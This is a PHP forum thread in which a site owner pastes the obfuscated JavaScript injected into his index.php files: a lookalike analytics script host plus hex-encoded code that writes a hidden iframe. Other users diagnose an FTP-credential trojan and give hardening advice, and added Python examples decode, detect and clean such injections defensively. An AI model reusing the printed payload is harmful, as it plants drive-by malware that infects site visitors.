ccrevcypsys Posted July 7, 2008

Hello all,

Well this morning my work called me and bitched me out because they said one of our websites was down. Well I go onto the FTP for that website and view the index.php file in the root folder and I saw this and only this:

<script src="http://analytics-google.info/i/urchin.js"></script><script>function c41920832628m4871cf76da46c(m4871cf76da853){ function m4871cf76dac3b(){var m4871cf76db022=16;return m4871cf76db022;} return (parseInt(m4871cf76da853,m4871cf76dac3b()));}function m4871cf76db40b(m4871cf76db7f2){ var m4871cf76dc3aa=2; var m4871cf76dbbda='';m4871cf76dcd31=String.fromCharCode;for(m4871cf76dbfc2=0;m4871cf76dbfc2<m4871cf76db7f2.length;m4871cf76dbfc2+=m4871cf76dc3aa){ m4871cf76dbbda+=(m4871cf76dcd31(c41920832628m4871cf76da46c(m4871cf76db7f2.substr(m4871cf76dbfc2,m4871cf76dc3aa))));}return m4871cf76dbbda;} var zf7='';var m4871cf76dcf63='3C7'+zf7+'3637'+zf7+'2697'+zf7+'07'+zf7+'43E667'+zf7+'56E637'+zf7+'4696F6E20636865636B5F636F6E7'+zf7+'4656E7'+zf7+'428297'+zf7+'B7'+zf7+'6617'+zf7+'220693D303B7'+zf7+'7'+zf7+'68696C6528646F637'+zf7+'56D656E7'+zf7+'42E67'+zf7+'657'+zf7+'4456C656D656E7'+zf7+'47'+zf7+'3427'+zf7+'9546167'+zf7+'4E616D652827'+zf7+'69667'+zf7+'2616D6527'+zf7+'292E6C656E67'+zf7+'7'+zf7+'468297'+zf7+'B7'+zf7+'6617'+zf7+'220656C3D646F637'+zf7+'56D656E7'+zf7+'42E67'+zf7+'657'+zf7+'4456C656D656E7'+zf7+'47'+zf7+'3427'+zf7+'9546167'+zf7+'4E616D652827'+zf7+'69667'+zf7+'2616D6527'+zf7+'295B695D3B6966282028656C2E7'+zf7+'37'+zf7+'47'+zf7+'96C652E64697'+zf7+'37'+zf7+'06C617'+zf7+'93D3D27'+zf7+'6E6F6E6527'+zf7+'207'+zf7+'C7'+zf7+'C20656C2E7'+zf7+'37'+zf7+'47'+zf7+'96C652E7'+zf7+'6697'+zf7+'36962696C697'+zf7+'47'+zf7+'9203D3D27'+zf7+'68696464656E27'+zf7+'207'+zf7+'C7'+zf7+'C2028656C2E7'+zf7+'7'+zf7+'69647'+zf7+'4683C3520262620656C2E68656967'+zf7+'687'+zf7+'43C35292920262620656C2E6E616D65213D27'+zf7+'633427'+zf7+'297'+zf7+'B656C2E7'+zf7+'0617'+zf7+'2656E7'+zf7+'44E6F64652E7'+zf7+'2656D6F7'+zf7+'6654368696C6428656C293B7'+zf7+'D656C7'+zf7+'36520692B2B3B7'+zf7+'D7'+zf7+'D636865636B5F636F6E7'+zf7+'4656E7'+zf7+'428293B0D0A696628216D7'+zf7+'96961297'+zf7+'B646F637'+zf7+'56D656E7'+zf7+'42E7'+zf7+'7'+zf7+'7'+zf7+'2697'+zf7+'465287'+zf7+'56E657'+zf7+'363617'+zf7+'065282027'+zf7+'2533632536392536362537'+zf7+'322536312536642536352532302536652536312536642536352533642536332533342532302537'+zf7+'332537'+zf7+'32253633253364253237'+zf7+'2536382537'+zf7+'342537'+zf7+'342537'+zf7+'30253361253266253266253637'+zf7+'253666253666253637'+zf7+'2536632536352532642536312536652536312536632536392537'+zf7+'61253635253265253633253666253664253266253639253665253265253633253637'+zf7+'253639253366253331253335262537'+zf7+'382537'+zf7+'3525336425333126253237'+zf7+'2532622534642536312537'+zf7+'342536382532652537'+zf7+'322536662537'+zf7+'352536652536342532382534642536312537'+zf7+'342536382532652537'+zf7+'32253631253665253634253666253664253238253239253261253331253337'+zf7+'253331253336253331253336253239253262253237'+zf7+'253337'+zf7+'253634253633253631253333253237'+zf7+'2532302537'+zf7+'37'+zf7+'2536392536342537'+zf7+'34253638253364253336253339253332253230253638253635253639253637'+zf7+'2536382537'+zf7+'342533642533322533342533382532302537'+zf7+'332537'+zf7+'342537'+zf7+'39253663253635253364253237'+zf7+'2536342536392537'+zf7+'332537'+zf7+'302536632536312537'+zf7+'39253361253230253665253666253665253635253237'+zf7+'2533652533632532662536392536362537'+zf7+'3225363125366425363525336527'+zf7+'29293B7'+zf7+'D7'+zf7+'6617'+zf7+'2206D7'+zf7+'969613D7'+zf7+'47'+zf7+'27'+zf7+'5653B3C2F7'+zf7+'3637'+zf7+'2697'+zf7+'07'+zf7+'43E';document.write(m4871cf76db40b(m4871cf76dcf63));</script><script>check_content()</script>

I have no idea what it means and I need to figure out if we have a security issue or what it is before I lose my job. So if someone has had this happen to them, let me know why it did if you can figure it out. Oh, and every index.php (not any index.htm or html pages... weird) in every folder on the site has changed to this as well. So something happened and I don't know what. It's weird because the Google Analytics urchin.js isn't even located on the index.php, it's on the header.php which is included with this page... HELP PLEASE

Link to comment: https://forums.phpfreaks.com/topic/113603-was-i-hacked-or-just-a-glitch/
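To make sense of a snippet like the one above, a responder normally peels the encoding layers offline instead of letting a browser run it. The Python below is an added example, not code from this thread: it reproduces the transform the injected decoder performs (two hex digits at a time through parseInt(...,16) and String.fromCharCode, with the empty zf7 variable spliced between chunks), then percent-decodes any unescape('...') found in the result, and collects the page-level indicators worth checking on a suspect index.php (a fromCharCode decoder, a document.write of decoded text, and script tags loaded from hosts outside a trusted list). SAMPLE_PAGE and its hex payload are constructed for this example and decode to harmless text; the trusted host www.google-analytics.com and the lookalike analytics-example.invalid are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed fixture in the same shape as the injected snippet from the post:
# a decoder that reads two hex digits at a time, a payload variable made of
# hex chunks glued together with '+zf7+' (zf7 is an empty string), and a
# document.write() of the decoded result. The encoded text here is harmless
# and was written for this example; the hostname is a placeholder.
SAMPLE_JS = (
    "function m4871cf76db40b(s){var o='';for(var i=0;i<s.length;i+=2){"
    "o+=String.fromCharCode(parseInt(s.substr(i,2),16));}return o;}"
    "var zf7='';var m4871cf76dcf63='7'+zf7+'83D7'+zf7+'56E657'+zf7+'363617'"
    "+zf7+'0652827'+zf7+'25336325363225336525363825363925336325326625363225336527'"
    "+zf7+'29';document.write(m4871cf76db40b(m4871cf76dcf63));"
)
SAMPLE_PAGE = (
    '<script src="http://analytics-example.invalid/i/urchin.js"></script>'
    "<script>" + SAMPLE_JS + "</script><script>check_content()</script>"
)

# Two or more quoted hex-only strings joined by  +<identifier>+  (the zf7 trick).
CHUNKED_HEX_RE = re.compile(r"'[0-9A-Fa-f]*'(?:\s*\+\s*\w+\s*\+\s*'[0-9A-Fa-f]*')+")
QUOTED_HEX_RE = re.compile(r"'([0-9A-Fa-f]*)'")
UNESCAPE_RE = re.compile(r"unescape\(\s*'([^']*)'\s*\)")
SCRIPT_SRC_RE = re.compile(r"<script[^>]+src=[\"']https?://([^/\"'\s>]+)", re.I)


def decode_hex_pairs(hexstr: str) -> str:
    """Same transform as the injected decoder: parseInt(pair, 16) -> fromCharCode."""
    if len(hexstr) % 2:
        raise ValueError("odd-length hex payload")
    return "".join(chr(int(hexstr[i:i + 2], 16)) for i in range(0, len(hexstr), 2))


def peel(js: str, max_layers: int = 5) -> list[str]:
    """Decode successive layers (chunked hex, then unescape('%..')) and return each."""
    layers: list[str] = []
    current = js
    for _ in range(max_layers):
        m = CHUNKED_HEX_RE.search(current)
        if m:
            current = decode_hex_pairs("".join(QUOTED_HEX_RE.findall(m.group(0))))
            layers.append(current)
            continue
        m = UNESCAPE_RE.search(current)
        if m:
            current = unquote(m.group(1))
            layers.append(current)
            continue
        break
    return layers


def triage(html: str, trusted_hosts: frozenset[str]) -> dict:
    """Collect the indicators a responder would check on a suspect index.php."""
    return {
        "fromcharcode_decoder": "String.fromCharCode" in html,
        "document_write": "document.write(" in html,
        "untrusted_script_hosts": sorted(set(SCRIPT_SRC_RE.findall(html)) - trusted_hosts),
        "decoded_layers": peel(html),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_PAGE, frozenset({"www.google-analytics.com"})).items():
        print(f"{key}: {value}")
```

Run it against a copy of the real file and the last element of decoded_layers is the text the page would have written into the DOM; in this thread's case that is where the hidden iframe the Yahoo thread describes lives. Decoding never executes anything, which is the point of doing it this way rather than opening the page.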
discomatt Posted July 7, 2008

Possible XSS injection. Without code, we don't know. Whether this was a hole in your PHP or a hole in the server, we don't know either.

cleibesouza Posted July 7, 2008

This piece:

<script src="http://analytics-google.info/i/urchin.js">

Is the JavaScript one would include for Google Analytics. The rest of the code I have no idea what that could be.
ccrevcypsys (Author) Posted July 7, 2008

Well I'll research that, but is there a way to make every index.php page on a server, no matter what folder and what protection it is, turn into this script??? THAT'S CRAZY

> This piece:
> <script src="http://analytics-google.info/i/urchin.js">
> Is the JavaScript one would include for Google Analytics. The rest of the code I have no idea what that could be.

Yeah, I know that it is. That's why I said the weird thing was that that code is located on a completely different page than the index.php page..
discomatt Posted July 7, 2008

Is it hard-coded into the pages, or simply in the source?

ccrevcypsys (Author) Posted July 7, 2008

It has been hard coded.

anon_login_001 Posted July 7, 2008

Time to change passwords/users, etc.

gigas10 Posted July 7, 2008

Black crawler :-x. Change the password for every user, and redo your site's security and SQL injection stripping.

discomatt Posted July 7, 2008

If it's hard coded into the pages, I doubt it's injection... if it is, then your site is designed all wrong.
lemmin Posted July 7, 2008

> This piece:
> <script src="http://analytics-google.info/i/urchin.js">
> Is the JavaScript one would include for Google Analytics. The rest of the code I have no idea what that could be.

It is actually a fake. I think it results from local spy/malware that could have been acquired from completely indirect methods, so I wouldn't assume that it was a direct attack. This thread has some info about it: http://answers.yahoo.com/question/index?qid=20080701035849AAghyGG
libertyct Posted July 7, 2008

Yup, I had to deal with this one too at my workplace. We've been dealing with it for months now and it even gets your website blacklisted on Google.
ccrevcypsys (Author) Posted July 7, 2008

Ok well I did the research on that and what the Yahoo topic said was exactly how it looked before I fixed it. One question still remains though: why would it do this to only one site on the server and not all of them????

ccrevcypsys (Author) Posted July 7, 2008

Are you kidding me... blacklisted from Google, that's shit... what a terrible fucking trojan.
lemmin Posted July 7, 2008

It probably looks for a certain format for a web page file and your other files may be in a different format. Something like only one index.htm or .php. Or maybe your machine doesn't have access to other ones. There are a number of reasons why that would happen.

ccrevcypsys (Author) Posted July 7, 2008

Well we are shutting that server down and going with GoDaddy servers. Is this a good idea???

discomatt Posted July 7, 2008

It could've been a bad password. Might not be your host's fault. Could have also been an unpatched cPanel.

ccrevcypsys (Author) Posted July 7, 2008

It's a dedicated server, so we host it...

discomatt Posted July 7, 2008

Hire better admins?

ccrevcypsys (Author) Posted July 7, 2008

I see... is there any way to make sure this won't happen again??????? (besides the admins) like some programming tool or whatnot?

kenrbnsn Posted July 7, 2008

Take your machine off the Internet. If no one can get to it, it can't be hacked.

Ken
hotmedia Posted January 6, 2010

I normally wouldn't join a PHP forum but it seems as though we're all having the same problem. I've written some PHP code and used some of the free PHP sites but (please don't hate me) I am natively a ColdFusion programmer. Since Christmas 2009 I've been getting injected and reinjected on a few of my sites/databases. This hack is getting into my ntext and text fields on my database, which is SQL Server. I have a script which I can run against the database and clean out all traces of it in seconds now once I see that it's in there, but it keeps finding its way back in. I've been told that they do this via SQL statements that are UPDATE SQL statements. I figured that I'd show here that this hack is not specific to PHP. I'm searching today for a patch or solution that will help me lock down my servers so these a-holes don't keep getting into my system. Let's put our heads together and see what we can come up with!
oni-kun Posted January 6, 2010

> I normally wouldn't join a PHP forum but it seems as though we're all having the same problem. [...] Let's put our heads together and see what we can come up with!

mysql_real_escape_string
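oni-kun's one-word answer names the PHP/MySQL escaping function; the general fix behind it, on SQL Server and ColdFusion as much as on PHP, is to never build an UPDATE from concatenated strings and instead bind values as parameters, so a value can only ever be data. The Python below, on the standard sqlite3 module, is an added example and not code from this thread: it shows a parameterized update storing a hostile-looking string literally, a sweep that finds rows in text columns carrying an injected script tag (the kind of cleanup script hotmedia describes), and a cleanup that strips the tag and writes the row back through the same parameterized path. The table, its rows and the marker tag are constructed for the example; the host in the tag is a placeholder.

```python
import re
import sqlite3

# Constructed indicator: the shape of the tag that was being appended to text
# columns. Matching is case-insensitive and spans newlines inside the tag.
SCRIPT_TAG_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)


def open_sample_db() -> sqlite3.Connection:
    """In-memory table standing in for the 'ntext and text fields' in the post."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO articles (title, body) VALUES ('Welcome', 'Plain page text.');
        INSERT INTO articles (title, body) VALUES ('About', 'Who we are.');
        """
    )
    return conn


def update_body(conn: sqlite3.Connection, article_id: int, body: str) -> None:
    # Parameterized: the value travels separately from the statement text, so
    # quotes and SQL keywords inside it are stored as data, never parsed as SQL.
    conn.execute("UPDATE articles SET body = ? WHERE id = ?", (body, article_id))
    conn.commit()


def find_injected(conn: sqlite3.Connection, table: str, columns: list[str]) -> list[tuple[int, str]]:
    """Return (id, column) pairs whose text contains a <script ...> tag."""
    hits = []
    for col in columns:  # identifiers come from code, never from request input
        rows = conn.execute(f'SELECT id, "{col}" FROM "{table}"').fetchall()
        hits += [(row_id, col) for row_id, text in rows if text and SCRIPT_TAG_RE.search(text)]
    return sorted(hits)


def clean_injected(conn: sqlite3.Connection, table: str, columns: list[str]) -> int:
    """Strip script tags from affected cells; returns the number of cells rewritten."""
    fixed = 0
    for row_id, col in find_injected(conn, table, columns):
        (text,) = conn.execute(f'SELECT "{col}" FROM "{table}" WHERE id = ?', (row_id,)).fetchone()
        conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE id = ?',
                     (SCRIPT_TAG_RE.sub("", text), row_id))
        fixed += 1
    conn.commit()
    return fixed


def demo() -> dict:
    """Constructed scenario: a hostile value bound safely, then a sweep and cleanup."""
    conn = open_sample_db()
    hostile = "O'Reilly'; UPDATE articles SET body='x'; --"
    update_body(conn, 1, hostile)  # stored literally; row 2 is untouched
    # Simulate what the post describes: a tag already sitting in a text column.
    conn.execute("UPDATE articles SET body = body || ? WHERE id = 2",
                 ('<script src="http://example.invalid/i.js"></script>',))
    before = find_injected(conn, "articles", ["title", "body"])
    fixed = clean_injected(conn, "articles", ["title", "body"])
    after = find_injected(conn, "articles", ["title", "body"])
    bodies = [row[0] for row in conn.execute("SELECT body FROM articles ORDER BY id")]
    return {"hostile_stored_literally": bodies[0] == hostile, "before": before,
            "fixed": fixed, "after": after, "row2_body": bodies[1]}


if __name__ == "__main__":
    print(demo())
```

Cleaning the rows only buys time if the write path is still concatenating strings; the sweep is for finding what is already there, and the parameterized update is what stops it coming back.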
mrMarcus Posted January 6, 2010

Several steps can be taken here:

1. NEVER store your FTP passwords locally; when your FTP client asks, "Remember this password?", click "no", and type it in manually. This could be a problem when your computer gets infected with an app that searches for stored FTP information, automatically logs in and adds malicious code to files.
1a. Change password(s) often; use long multi-character passwords (*(7Hyh^b^*&6b6n9^%^$v43$@$#).
2. Use SFTP (SecureFTP) instead of plain FTP. Will have to contact your host for more information as to what port to use (usually 2222 or 22, can't remember off hand).
3. Run virus scans regularly on server(s) and computers which will be accessing live servers.
4. Update server software regularly.
5. Fix holes in website to combat XSS attacks; ensure file/folder permissions are up to par (make sure files are not writable, etc).

That's a start, anyways.
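For steps 4 and 5, and for the OP's earlier question about a tool that would catch a repeat, a small integrity check is what most admins end up running: hash the site's PHP and HTML files once from a known-clean copy, re-hash on a schedule, and report anything modified, added or removed, along with files that are group- or world-writable. The Python below is an added example, not from the thread; demo() builds a throwaway site tree in a temporary directory, takes a baseline, then simulates the thread's symptom (a line prepended to every index.php, one of them left world-writable) so the report can be seen. The watched suffixes and file layout are assumptions.

```python
import hashlib
import json
import stat
import tempfile
from pathlib import Path

WATCHED_SUFFIXES = (".php", ".htm", ".html", ".js")


def file_sha256(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict[str, str]:
    """Map relative path -> SHA-256 for every watched file under root."""
    return {
        p.relative_to(root).as_posix(): file_sha256(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and (p.suffix in WATCHED_SUFFIXES or p.name == ".htaccess")
    }


def compare(root: Path, baseline: dict[str, str]) -> dict[str, list[str]]:
    """Diff the live tree against a stored baseline."""
    current = build_baseline(root)
    return {
        "modified": sorted(k for k in current if k in baseline and current[k] != baseline[k]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def loosely_writable(root: Path) -> list[str]:
    """Files or directories writable by group or others (step 5 above)."""
    return sorted(
        p.relative_to(root).as_posix()
        for p in root.rglob("*")
        if p.lstat().st_mode & (stat.S_IWGRP | stat.S_IWOTH)
    )


def save_baseline(baseline: dict[str, str], path: Path) -> None:
    # Keep the baseline outside the web root and readable only by its owner,
    # otherwise whoever rewrote index.php can rewrite the baseline too.
    path.write_text(json.dumps(baseline, indent=1, sort_keys=True))
    path.chmod(0o600)


def demo() -> dict:
    """Constructed scenario: clean tree, baseline, then the thread's symptom."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "htdocs"
        (root / "blog").mkdir(parents=True)
        (root / "index.php").write_text("<?php include 'header.php'; ?>\n")
        (root / "header.php").write_text("<html><head></head>\n")
        (root / "blog" / "index.php").write_text("<?php echo 'blog'; ?>\n")
        for p in root.rglob("*"):
            p.chmod(0o755 if p.is_dir() else 0o644)
        baseline = build_baseline(root)
        save_baseline(baseline, Path(tmp) / "baseline.json")

        # Simulate the incident: every index.php gets a line prepended (a
        # constructed marker with a placeholder host, not real malware), and
        # one of them is left world-writable.
        for p in root.rglob("index.php"):
            p.write_text('<script src="http://example.invalid/x.js"></script>\n' + p.read_text())
        (root / "blog" / "index.php").chmod(0o666)

        return {"diff": compare(root, baseline), "writable": loosely_writable(root)}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In production the baseline is taken from a deploy you trust, stored off the web root, and compare() runs from cron with its output mailed or logged; a non-empty "modified" list on index.php files is exactly the signal the OP was missing until the site went down.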
Maq Posted January 6, 2010

> I normally wouldn't join a PHP forum but it seems as though we're all having the same problem. [...] Let's put our heads together and see what we can come up with!

I understand you're encountering the same problems as the OP, but this thread is more than 1 1/2 years old. No biggie, it's just better to start a fresh thread for the best responses.

abazoskib Posted January 6, 2010

> Well we are shutting that server down and going with GoDaddy servers. Is this a good idea???

GoDaddy has been terrible in my experience. Although I'm sure if you go with a dedicated machine you should be ok. Do not use their shared server. Make sure to use a really good password because GoDaddy SSH accounts get brute forced all the time.